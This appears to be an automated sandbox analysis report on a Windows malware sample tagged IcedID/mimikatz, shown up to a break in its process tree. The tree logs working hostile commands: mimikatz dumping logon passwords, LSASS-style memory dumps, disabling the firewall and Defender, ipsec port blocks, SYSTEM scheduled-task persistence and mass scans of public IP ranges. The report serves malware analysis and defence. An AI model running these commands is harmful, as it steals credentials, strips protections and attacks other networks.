Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-01-2025 01:05

General

  • Target

    2025-01-17_262abed40fe8690d918c65da34fe4217_hacktools_icedid_mimikatz.exe

  • Size

    13.6MB

  • MD5

    262abed40fe8690d918c65da34fe4217

  • SHA1

    2ed49fc291461e274a4b44bab80db540bd32927c

  • SHA256

    182eaacc0d8fa7bc58e52f015769a75874dcc3ef8ae8144040fc69ea581b779f

  • SHA512

    d1e470331698e962d4727f1298f3648b83c23e0013a5f0125e3360250e5b8cf5e4deea76604edf6117458c0e4d4f79ebdf06d0734833c7fa136232588830977e

  • SSDEEP

    98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Mimikatz family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (30541) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 4 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 30 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 37 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 45 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:1724
      • C:\Windows\TEMP\euvjkzbtq\jlzptc.exe
        "C:\Windows\TEMP\euvjkzbtq\jlzptc.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1996
    • C:\Users\Admin\AppData\Local\Temp\2025-01-17_262abed40fe8690d918c65da34fe4217_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-01-17_262abed40fe8690d918c65da34fe4217_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2268
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\lmilpzbe\ikczumq.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:1948
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:4140
        • C:\Windows\lmilpzbe\ikczumq.exe
          C:\Windows\lmilpzbe\ikczumq.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:3548
    • C:\Windows\lmilpzbe\ikczumq.exe
      C:\Windows\lmilpzbe\ikczumq.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4168
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:632
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2260
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
            PID:3232
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4844
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
            3⤵
              PID:1920
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:1564
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
              3⤵
                PID:4932
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static del all
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:3688
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add policy name=Bastards description=FuckingBastards
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:3192
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filteraction name=BastardsList action=block
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:2272
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c C:\Windows\bbvjklivm\ijtzbqgit\wpcap.exe /S
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3508
              • C:\Windows\bbvjklivm\ijtzbqgit\wpcap.exe
                C:\Windows\bbvjklivm\ijtzbqgit\wpcap.exe /S
                3⤵
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops file in System32 directory
                • Drops file in Program Files directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:652
                • C:\Windows\SysWOW64\net.exe
                  net stop "Boundary Meter"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3168
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop "Boundary Meter"
                    5⤵
                      PID:1368
                  • C:\Windows\SysWOW64\net.exe
                    net stop "TrueSight Meter"
                    4⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:3720
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop "TrueSight Meter"
                      5⤵
                        PID:2564
                    • C:\Windows\SysWOW64\net.exe
                      net stop npf
                      4⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of WriteProcessMemory
                      PID:4580
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop npf
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:1680
                    • C:\Windows\SysWOW64\net.exe
                      net start npf
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:2640
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 start npf
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:2676
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net start npf
                  2⤵
                    PID:1956
                    • C:\Windows\SysWOW64\net.exe
                      net start npf
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:3560
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 start npf
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:4544
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net start npf
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:4644
                    • C:\Windows\SysWOW64\net.exe
                      net start npf
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:2860
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 start npf
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:4844
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c C:\Windows\bbvjklivm\ijtzbqgit\vvlzbybmb.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\bbvjklivm\ijtzbqgit\Scant.txt
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:4048
                    • C:\Windows\bbvjklivm\ijtzbqgit\vvlzbybmb.exe
                      C:\Windows\bbvjklivm\ijtzbqgit\vvlzbybmb.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\bbvjklivm\ijtzbqgit\Scant.txt
                      3⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:2832
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c C:\Windows\bbvjklivm\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\bbvjklivm\Corporate\log.txt
                    2⤵
                    • Drops file in Windows directory
                    PID:4904
                    • C:\Windows\bbvjklivm\Corporate\vfshost.exe
                      C:\Windows\bbvjklivm\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                      3⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1204
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "nqicumbnp" /ru system /tr "cmd /c C:\Windows\ime\ikczumq.exe"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3492
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:1120
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "nqicumbnp" /ru system /tr "cmd /c C:\Windows\ime\ikczumq.exe"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:2340
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "kcyklqzng" /ru system /tr "cmd /c echo Y|cacls C:\Windows\lmilpzbe\ikczumq.exe /p everyone:F"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:764
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:2488
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "kcyklqzng" /ru system /tr "cmd /c echo Y|cacls C:\Windows\lmilpzbe\ikczumq.exe /p everyone:F"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:4272
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "jkumziicp" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\euvjkzbtq\jlzptc.exe /p everyone:F"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:3832
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                        PID:4928
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /sc minute /mo 1 /tn "jkumziicp" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\euvjkzbtq\jlzptc.exe /p everyone:F"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:1704
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:4440
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:3836
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:1996
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static set policy name=Bastards assign=y
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:1628
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:3748
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:2284
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:2016
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static set policy name=Bastards assign=y
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:2112
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:1516
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:1720
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:1948
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static set policy name=Bastards assign=y
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:3932
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop SharedAccess
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:4072
                      • C:\Windows\SysWOW64\net.exe
                        net stop SharedAccess
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:2148
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 stop SharedAccess
                          4⤵
                            PID:4664
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c netsh firewall set opmode mode=disable
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:2328
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh firewall set opmode mode=disable
                          3⤵
                          • Modifies Windows Firewall
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:2528
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c netsh Advfirewall set allprofiles state off
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:2540
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh Advfirewall set allprofiles state off
                          3⤵
                          • Modifies Windows Firewall
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:2352
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop MpsSvc
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:2924
                        • C:\Windows\SysWOW64\net.exe
                          net stop MpsSvc
                          3⤵
                            PID:404
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop MpsSvc
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:1968
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c net stop WinDefend
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:1088
                          • C:\Windows\SysWOW64\net.exe
                            net stop WinDefend
                            3⤵
                              PID:4632
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop WinDefend
                                4⤵
                                  PID:3832
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c net stop wuauserv
                              2⤵
                                PID:776
                                • C:\Windows\SysWOW64\net.exe
                                  net stop wuauserv
                                  3⤵
                                    PID:3988
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop wuauserv
                                      4⤵
                                        PID:4188
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c sc config MpsSvc start= disabled
                                    2⤵
                                      PID:3928
                                      • C:\Windows\SysWOW64\sc.exe
                                        sc config MpsSvc start= disabled
                                        3⤵
                                        • Launches sc.exe
                                        • System Location Discovery: System Language Discovery
                                        PID:4472
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c sc config SharedAccess start= disabled
                                      2⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:676
                                      • C:\Windows\SysWOW64\sc.exe
                                        sc config SharedAccess start= disabled
                                        3⤵
                                        • Launches sc.exe
                                        • System Location Discovery: System Language Discovery
                                        PID:764
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c sc config WinDefend start= disabled
                                      2⤵
                                        PID:748
                                        • C:\Windows\System32\Conhost.exe
                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          3⤵
                                            PID:4272
                                          • C:\Windows\SysWOW64\sc.exe
                                            sc config WinDefend start= disabled
                                            3⤵
                                            • Launches sc.exe
                                            • System Location Discovery: System Language Discovery
                                            PID:4984
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c sc config wuauserv start= disabled
                                          2⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:4640
                                          • C:\Windows\SysWOW64\sc.exe
                                            sc config wuauserv start= disabled
                                            3⤵
                                            • Launches sc.exe
                                            PID:4448
                                        • C:\Windows\TEMP\xohudmc.exe
                                          C:\Windows\TEMP\xohudmc.exe
                                          2⤵
                                          • Executes dropped EXE
                                          • Drops file in System32 directory
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious use of SetWindowsHookEx
                                          PID:4368
                                        • C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe
                                          C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe -accepteula -mp 784 C:\Windows\TEMP\bbvjklivm\784.dmp
                                          2⤵
                                          • Executes dropped EXE
                                          • Modifies data under HKEY_USERS
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3620
                                        • C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe
                                          C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe -accepteula -mp 336 C:\Windows\TEMP\bbvjklivm\336.dmp
                                          2⤵
                                          • Executes dropped EXE
                                          • Modifies data under HKEY_USERS
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3668
                                        • C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe
                                          C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe -accepteula -mp 1724 C:\Windows\TEMP\bbvjklivm\1724.dmp
                                          2⤵
                                          • Executes dropped EXE
                                          • Modifies data under HKEY_USERS
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3088
                                        • C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe
                                          C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe -accepteula -mp 2604 C:\Windows\TEMP\bbvjklivm\2604.dmp
                                          2⤵
                                          • Executes dropped EXE
                                          • Modifies data under HKEY_USERS
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2796
                                        • C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe
                                          C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe -accepteula -mp 2756 C:\Windows\TEMP\bbvjklivm\2756.dmp
                                          2⤵
                                          • Executes dropped EXE
                                          • Modifies data under HKEY_USERS
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1704
                                          • C:\Windows\System32\Conhost.exe
                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            3⤵
                                              PID:4632
                                          • C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe
                                            C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe -accepteula -mp 3004 C:\Windows\TEMP\bbvjklivm\3004.dmp
                                            2⤵
                                            • Executes dropped EXE
                                            • Modifies data under HKEY_USERS
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1752
                                          • C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe
                                            C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe -accepteula -mp 3012 C:\Windows\TEMP\bbvjklivm\3012.dmp
                                            2⤵
                                            • Executes dropped EXE
                                            • Modifies data under HKEY_USERS
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:408
                                          • C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe
                                            C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe -accepteula -mp 3820 C:\Windows\TEMP\bbvjklivm\3820.dmp
                                            2⤵
                                            • Executes dropped EXE
                                            • Modifies data under HKEY_USERS
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3284
                                          • C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe
                                            C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe -accepteula -mp 3912 C:\Windows\TEMP\bbvjklivm\3912.dmp
                                            2⤵
                                            • Executes dropped EXE
                                            • Modifies data under HKEY_USERS
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2440
                                          • C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe
                                            C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe -accepteula -mp 4024 C:\Windows\TEMP\bbvjklivm\4024.dmp
                                            2⤵
                                            • Executes dropped EXE
                                            • Modifies data under HKEY_USERS
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2040
                                          • C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe
                                            C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe -accepteula -mp 2648 C:\Windows\TEMP\bbvjklivm\2648.dmp
                                            2⤵
                                            • Executes dropped EXE
                                            • Modifies data under HKEY_USERS
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3620
                                          • C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe
                                            C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe -accepteula -mp 4208 C:\Windows\TEMP\bbvjklivm\4208.dmp
                                            2⤵
                                            • Executes dropped EXE
                                            • Modifies data under HKEY_USERS
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4136
                                          • C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe
                                            C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe -accepteula -mp 4228 C:\Windows\TEMP\bbvjklivm\4228.dmp
                                            2⤵
                                            • Executes dropped EXE
                                            • Modifies data under HKEY_USERS
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3828
                                          • C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe
                                            C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe -accepteula -mp 4392 C:\Windows\TEMP\bbvjklivm\4392.dmp
                                            2⤵
                                            • Executes dropped EXE
                                            • Modifies data under HKEY_USERS
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2012
                                          • C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe
                                            C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe -accepteula -mp 4056 C:\Windows\TEMP\bbvjklivm\4056.dmp
                                            2⤵
                                            • Executes dropped EXE
                                            • Modifies data under HKEY_USERS
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3548
                                          • C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe
                                            C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe -accepteula -mp 5052 C:\Windows\TEMP\bbvjklivm\5052.dmp
                                            2⤵
                                            • Executes dropped EXE
                                            • Modifies data under HKEY_USERS
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1508
                                          • C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe
                                            C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe -accepteula -mp 3000 C:\Windows\TEMP\bbvjklivm\3000.dmp
                                            2⤵
                                            • Executes dropped EXE
                                            • Modifies data under HKEY_USERS
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2976
                                          • C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe
                                            C:\Windows\TEMP\bbvjklivm\ummbncjlt.exe -accepteula -mp 612 C:\Windows\TEMP\bbvjklivm\612.dmp
                                            2⤵
                                            • Executes dropped EXE
                                            • Modifies data under HKEY_USERS
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2156
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /c C:\Windows\bbvjklivm\ijtzbqgit\scan.bat
                                            2⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4904
                                            • C:\Windows\bbvjklivm\ijtzbqgit\bdzldttin.exe
                                              bdzldttin.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
                                              3⤵
                                              • Executes dropped EXE
                                              • Drops file in Windows directory
                                              • System Location Discovery: System Language Discovery
                                              PID:2652
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                            2⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:5864
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                              3⤵
                                                PID:5544
                                              • C:\Windows\SysWOW64\cacls.exe
                                                cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                                3⤵
                                                  PID:5868
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:5932
                                                • C:\Windows\SysWOW64\cacls.exe
                                                  cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:6084
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:5828
                                                • C:\Windows\SysWOW64\cacls.exe
                                                  cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:5912
                                            • C:\Windows\SysWOW64\xchlyg.exe
                                              C:\Windows\SysWOW64\xchlyg.exe
                                              1⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious use of SetWindowsHookEx
                                              PID:2908
                                            • C:\Windows\system32\cmd.EXE
                                              C:\Windows\system32\cmd.EXE /c C:\Windows\ime\ikczumq.exe
                                              1⤵
                                                PID:2112
                                                • C:\Windows\ime\ikczumq.exe
                                                  C:\Windows\ime\ikczumq.exe
                                                  2⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:2912
                                              • C:\Windows\system32\cmd.EXE
